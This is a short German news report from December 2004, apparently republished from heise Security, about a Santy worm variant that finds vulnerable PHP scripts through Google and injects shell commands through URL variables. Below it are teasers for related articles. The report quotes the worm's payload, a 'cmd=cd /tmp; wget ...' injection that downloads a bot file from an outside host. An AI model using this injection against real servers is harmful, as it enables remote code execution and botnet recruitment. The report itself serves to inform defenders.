Wurm attackiert PHP-Skripte
Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700
2004-12-26 00:00:00 2004-12-26 00:00:00 admin
Offenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form:
http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;
wget www.visualcoders.net/spybot.txt;
Ãberprüft das Skript den Inhalt der Variablen nicht ausreichend, werden unter Umständen die in der URL aufgeführten Kommandos ausgeführt. Der überlaufende IRC-Channel beweist, dass der Wurm mit dieser einfachen Vorgehensweise anscheinend erschreckend oft Erfolg hat. Der Wurm erzeugt mit den Anfragen eine beträchtliche Last auf dem Server.
hiese.de
Ratings
Here you can write a comment
Related topics
18-Jähriger für Linux-Kernel verantwortlich
Die Verantwortung für die Weiterentwicklung des Linux-Kernels 2.4 lastet seit kurzem auf den Schultern des 18-jährigen Brasilianers Marcelo Tosatti. Alan Cox, rechte Hand von Linux-Erfinder Linus Torvalds und bislang für die Kernel-Entwicklung verantwortl ...

Autor :
admin
Category:
Software & Web-Development
Zeit ist Geld, PC einfach selbst reparieren!
Wenn der PC nicht richtig läuft, wirft sie das in Ihrem Arbeitsalltag meist zurück. Dabei können Sie einige Probleme mit relativ wenig Aufwand und ohne intime Kenntnisse Ihres Rechners selbst lösene ...

Autor :
admin
Category:
Miscellaneous
Logdateien, Programmcode und Dokumentationen günstig drucken
Umwelt- und kostenbewusster Programmierer greift auf Refill-Patronen und Rebuilt-Kartuschen zu. Nicht ohne Grund. ...

Autor :
phpler
Category:
Software & Web-Development
CGI-Skripte bringen Apache-Webserver zum Stillstand
Im Modul mod_cgi kann ein Fehler die Webserver-Software Apache 2 zum Stillstand bringen. Die Funktion write() blockiert die weitere Ausführung des Skriptes, wenn ein ein CGI-Skript mehr als 4096 Byte nach STDERR schreibt. Daraus resultierend bleibt auch ...

Autor :
admin
Category:
Software & Web-Development
Github - Softwarepakete für Endnutzer zum Download bereitstellen
Github erweitert seine Dienste um die Möglichkeit, Softwarepakete direkt von der Plattform aus, Endkunden als Download anzubieten. ...

Autor :
admin
Category:
Miscellaneous
Hosting Vergleich in Deutschland
Um aus der Vielzahl unterschiedlicher Internetseiten, Webshops und Landingpages herauszustechen, ist die Wahl des passenden Domainnamens nicht die einzige, aber eine eben doch wichtige Entscheidung. ...

Autor :
admin
Category:
Miscellaneous